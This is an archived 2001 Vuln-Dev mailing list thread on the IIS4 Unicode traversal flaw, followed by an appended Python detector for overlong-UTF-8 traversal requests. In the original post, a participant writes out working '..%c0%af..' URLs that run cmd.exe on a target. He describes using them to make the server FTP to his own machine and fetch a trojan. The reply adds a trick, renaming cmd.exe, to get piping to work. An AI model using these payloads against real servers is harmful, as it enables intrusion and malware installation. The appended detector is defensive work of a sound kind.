Vulnerability Development mailing list archives
Re: unicode / iis4 (fwd)
From: Julian Linton <jlinton () CIS FAMU EDU>
Date: Sat, 6 Jan 2001 19:16:42 -0500
You must first copy cmd.exe to another name such as cmd1.exe. If you use cmd.exe it will not allow piping, but simply rename it and you got a winner.

http://www.securityfocus.com/templates/archive.pike?threads=0&end=2000-10-29&mid=141284&start=2000-10-23&list=1&fromthread=0&

gives you an example.

----- Original Message -----
From: "Mad Zigy" <zigy () GLOBAL CO ZA>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Saturday, January 06, 2001 7:59 AM
Subject: unicode / iis4

Well, I have been able to use msadc2.pl, yet the commands I give do not work. So I tried the other way by doing

http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test.txt

and all it did was say: The parameter is incorrect.

So then I thought maybe we can't have a > in the string, so I found the hex of it and tried

http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test+%3e+c:\test.txt

yet it still gave me the same: The parameter is incorrect.

I have been able to make it ftp into my PC by

http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+hostname

but I can't make it log in, as I need to echo a script which I can run

http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+-s:c:\ftp.txt+hostname

so that it will log in and download the exe / trojan.

Thankz
zigy!
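Added example, not part of the original thread: a detector for the request pattern discussed above. It keys on the overlong UTF-8 encoding and the traversal it hides rather than on the name cmd.exe, since the reply notes the binary may be copied under another name. The function names and the sample request targets are constructed for illustration, and the code assumes the raw, still percent-encoded request target is available to inspect.

```python
import re

PCT = re.compile(rb"%([0-9A-Fa-f]{2})")

def percent_decode(raw: str) -> bytes:
    """Decode %XX escapes to raw bytes without interpreting them as text."""
    return PCT.sub(lambda m: bytes([int(m.group(1), 16)]), raw.encode("latin-1"))

def canonicalize(data: bytes):
    """Collapse overlong 2-byte UTF-8 sequences; return (bytes, findings).

    Lead bytes 0xC0/0xC1 can only encode code points below 0x80, which valid
    UTF-8 writes as a single byte, so they never occur in legitimate input.
    """
    out, findings, i = bytearray(), [], 0
    while i < len(data):
        lead = data[i]
        nxt = data[i + 1] if i + 1 < len(data) else 0
        if lead in (0xC0, 0xC1) and 0x80 <= nxt <= 0xBF:
            hidden = ((lead & 0x1F) << 6) | (nxt & 0x3F)
            findings.append(f"overlong UTF-8 %{lead:02x}%{nxt:02x} hides {chr(hidden)!r}")
            out.append(hidden)
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out), findings

def inspect_request(target: str):
    """Return a list of findings for one raw request target."""
    path = target.split("?", 1)[0]
    canon, findings = canonicalize(percent_decode(path))
    # Check for ".." segments only after the hidden separators are restored.
    if b".." in re.split(rb"[/\\]", canon):
        findings.append("traversal after canonicalization: " + canon.decode("latin-1"))
    return findings

# Constructed sample request targets (the first uses the string from the post).
SAMPLES = [
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test",
    "/scripts/..%C0%AF../winnt/system32/cmd1.exe?/c+echo+test",  # renamed copy
    "/images/caf%c3%a9.gif",                                      # valid UTF-8
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(s, "->", inspect_request(s) or "clean")
```

A check for ".." segments made before canonicalization sees "..%c0%af.." as a single segment and misses the traversal, which is why the separator is restored first.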